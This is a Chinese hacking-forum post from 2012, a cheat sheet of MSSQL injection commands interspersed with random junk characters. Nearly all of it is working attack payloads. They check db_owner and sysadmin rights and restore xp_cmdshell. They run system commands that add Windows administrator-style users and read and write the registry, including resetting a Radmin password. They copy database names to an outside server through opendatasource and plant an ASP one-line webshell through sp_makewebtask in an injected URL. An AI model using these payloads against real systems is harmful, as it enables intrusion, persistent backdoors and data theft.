找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2151|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
. j/ w  p7 t! }% Qand 1=(Select IS_MEMBER('db_owner'))6 ?2 n. b) a8 f( M/ Z  w7 o
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--2 _7 N% l' H! O2 g4 A
+ @8 e3 @1 S5 [; p5 S
//检测是否有读取某数据库的权限
/ |) T* l' n, g- ]and 1= (Select HAS_DBACCESS('master'))
4 Y8 ^( D* H' t( s; JAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --- j$ ]* E, T' `1 S. E

9 A; E0 ^% D3 w6 h7 d. M  S
6 Q+ X4 \$ n& K! t9 V* p数字类型8 H( j; F  a6 b7 }4 N! I! W
and char(124)%2Buser%2Bchar(124)=0+ ^5 c; F4 Q1 h3 b. K- r
& j( b1 r0 ]1 F* Y
字符类型& U  U# ?( J4 ?/ a
' and char(124)%2Buser%2Bchar(124)=0 and ''='
+ g9 k0 z* x4 l9 I' x* `, v; K$ ^0 i: `
搜索类型
( `, I- H. L$ q' f' and char(124)%2Buser%2Bchar(124)=0 and '%'='& E, m7 R/ a9 ~* @/ p
4 p9 Q( G) z- E* C, C' x- E
爆用户名
. Q: b  J' S' G6 L, Land user>00 i) S4 ?. c/ j* X( g8 q
' and user>0 and ''='0 u0 b5 ~) y' a9 O! N! k" I

" \- U' H( p) I1 V" O检测是否为SA权限! J+ r8 C/ Z. g; C9 O( Y
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--- p$ l& B5 X/ |% [3 B2 w% C5 ]8 o
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
; Y5 A5 a: c1 N# u' S/ v& D8 w8 Q, t
0 m2 W/ V' }7 P2 J: z. A! N检测是不是MSSQL数据库1 D* n: o( ]9 U) k+ M8 o4 ]
and exists (select * from sysobjects);--
% p1 C* \: w* B/ v8 y  q3 C9 i! s: w" T( Z- C" z) }) o* H! F5 K& K
检测是否支持多行
: f- P+ d7 g# n;declare @d int;--. J6 J* e3 {; E, z* I

7 S3 d2 g1 u, r) m) m% D恢复 xp_cmdshell
* @  r' F+ S) u" F2 `0 m;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
* [7 Z- p7 ^) p4 P- {/ F4 b" K" e  s: V3 \

9 ?8 K7 G7 Z/ l3 u9 Xselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')  i% K) K! ?* B7 G7 ~: _1 l) v( e2 p
/ @. B" j+ q: L3 W$ b+ I  w
//-----------------------
; `& I5 D2 H8 ~5 u//       执行命令
" @# H) @) j6 i' ~0 O//-----------------------
6 _8 q5 X' l% i" i2 `; X4 l5 M9 Y( M首先开启沙盘模式:
4 V9 v. _, G; pexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
5 C6 f, k" J1 J# r1 w
( Y1 ?+ ~* e) [$ m然后利用jet.oledb执行系统命令8 J; I: K6 t/ U* o5 v
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
$ R8 W+ g9 Z6 O: V: z- [" M2 X& S4 R/ s/ t  F
执行命令
- X  r# K$ l8 a% ~;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
: \3 S/ t( U; B: q) ~9 u4 U2 z6 U. D" h7 I1 I$ C, j0 i9 J
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
1 Y  r$ Q- E1 f5 X7 |3 v( N7 L" A3 B8 f8 L; g5 I3 P
判断xp_cmdshell扩展存储过程是否存在:
/ X0 f4 g8 @5 t- ]/ Lhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
6 c! @0 E, k5 n6 s$ ?" I: f$ T/ v' u7 r6 a# o
写注册表
& f3 q9 c% o, s' x3 }- y3 Texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 Y8 I" {' a/ @4 O5 \; p1 p6 @! s. @/ D
REG_SZ# X0 g9 o, n/ Q. K" G
) b# Q+ }. K7 z5 Z* ?
读注册表; B( ]6 m. K  j( ~1 i
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& u0 \" W8 L+ r# X' w5 |6 i2 u) c2 x% X- E
读取目录内容" g8 Z1 H5 f7 ]
exec master..xp_dirtree 'c:\winnt\system32\',1,1" F$ Y. b2 ^+ A. H, F' v( V+ W# y

& U" h) g$ w7 D8 z6 N1 t9 [/ Y9 s9 M& d- d* s3 q% V+ u; F
数据库备份
- S9 Q  V9 M* I6 sbackup database pubs to disk = 'c:\123.bak'
* P5 g# ?$ o" U. l0 B4 ~  z
; O! u4 r+ l4 |# W//爆出长度) r, i- e3 w' z( z, L2 h9 ~
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--3 ^7 e0 A9 D3 T

' L4 V1 B- e0 J/ Z
' ?* V  L0 v) U' M. G" k$ B3 o; H+ N; }3 o* G; d
更改sa口令方法:用sql综合利用工具连接后,执行命令:
. W: C) Z1 R) Uexec sp_password NULL,'新密码','sa'3 _8 D1 K5 A* _: E" V& k
, d& M+ r) }1 o: b+ D% A
添加和删除一个SA权限的用户test:! M8 Z7 P7 n5 ^0 I) S& F
exec master.dbo.sp_addlogin test,95307729 w7 \' |  ~. S3 Y1 S% [5 _' B
exec master.dbo.sp_addsrvrolemember test,sysadmin$ k$ B" Q; [% L; n; [9 i

6 X8 H& g$ V; M4 N  ~1 f$ M& D删除扩展存储过过程xp_cmdshell的语句:
* C0 v( X! s* D: pexec sp_dropextendedproc 'xp_cmdshell'
% i! |: R/ t9 f: B" w; E$ i5 v6 l( u2 Z# v
添加扩展存储过过程
* V9 p! p1 s. b4 d8 N% M8 _- oEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
5 k$ d3 M0 Q$ A9 CGRANT exec On xp_proxiedadata TO public3 f, j8 v  r7 Y
) u: C  t, }4 s
7 y0 E% I( z3 A5 U
停掉或激活某个服务。/ [/ K  O# W5 I# ?2 |# S, \$ d' |
# b! Y1 p% r6 M4 ?3 N# S& o
exec master..xp_servicecontrol 'stop','schedule'! u" b5 X' m4 X6 w
exec master..xp_servicecontrol 'start','schedule'
! p  Z' A; ?' P
# d  F- i: b" c6 x- Tdbo.xp_subdirs, l2 h( L% W, p2 i' E7 m" M
4 g; N0 \( ~- z8 z0 x9 e
只列某个目录下的子目录。! I8 m: [' P3 _  a0 {9 @
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 P3 M  v! X; \. A
2 d2 [2 ~4 _7 gdbo.xp_makecab+ ?$ c7 ]- X1 E

8 V8 p" W! V! T  z0 C# }% B. j将目标多个档案压缩到某个目标档案之内。
6 j! J" }: ~3 C% }7 a$ b所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。7 ~* C  |$ k1 X% K, g  Q" v8 a
! q% C: G3 k5 O% w& L% S9 X. {
dbo.xp_makecab
2 |! ?4 e8 H& Q. G'c:\test.cab','mszip',1,
% X7 }4 v$ T7 \2 Y6 {7 N) ]2 C: S5 `'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 w# K. ~! J1 L0 s! {'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'! K% v4 f) m) w7 o% E1 u
, ^) Z. R; \5 K9 }9 f( _
xp_terminate_process
; o' c; ^) V" `0 _5 ]* I- K, T8 \0 {4 A$ g  x' E$ S! u0 M
停掉某个执行中的程序,但赋予的参数是 Process ID。
5 |1 d* ^  n2 s; P( U( i利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
# R; Q6 U  i3 G1 X' T) \' g3 T5 b2 U9 I5 J7 S6 |
xp_terminate_process 24847 v) k% Y+ J; O$ R" i
8 c1 k0 M. C! c% S$ ^
xp_unpackcab
: I5 L! r& u' B- ^6 l
- T6 O# _% _$ ~$ G6 v解开压缩档。
5 J% U3 X( q* k5 s# |3 r% h  h' z8 s8 P" y
xp_unpackcab 'c:\test.cab','c:\temp',1! k, X. w! N0 o4 n3 _
: c- w. r" |5 m7 a+ \$ k8 d
+ v; z; u! Y" X( [% m2 y% y
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12340 x" Q& e! h8 I4 a0 Z

' c% t0 V( Z  N% W* I' K0 a+ N1 Mcreate database lcx;1 Q+ ]0 {6 R' M& S; W" p  E
Create TABLE ku(name nvarchar(256) null);
) V$ [! [8 g$ d" D3 w/ a; JCreate TABLE biao(id int NULL,name nvarchar(256) null);
" S6 o2 |* G% f9 v
6 [+ x7 E  H2 ^! _//得到数据库名2 o7 E9 [7 m4 a) @$ C' n4 e6 `
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
, C9 u7 I! N9 j3 d5 Z- S% Y7 v' a' m
* {) v& P6 K6 J( v8 I8 c  E- S0 {5 m; _7 _/ u+ ^
//在Master中创建表,看看权限怎样0 G5 a2 ]8 S3 \% j5 h+ d+ o( _
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--* W9 |  Y  |6 \4 R& ]2 r/ o. Z
5 v! r  ^. H3 ]2 e9 r
用 sp_makewebtask直接在web目录里写入一句话马:
; x, u- H/ p: i: Y6 r. x" L/ [http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--4 o! T0 ^% A! J0 j# a' B
# q  R" G* X+ f! C5 s: b9 A+ D
//更新表内容% G1 x$ _9 b: r
Update films SET kind = 'Dramatic' Where id = 123
) l4 y6 V. u! y" L* _2 o( \8 y+ `) U$ \5 H
//删除内容
2 o. x8 r; Y& xdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表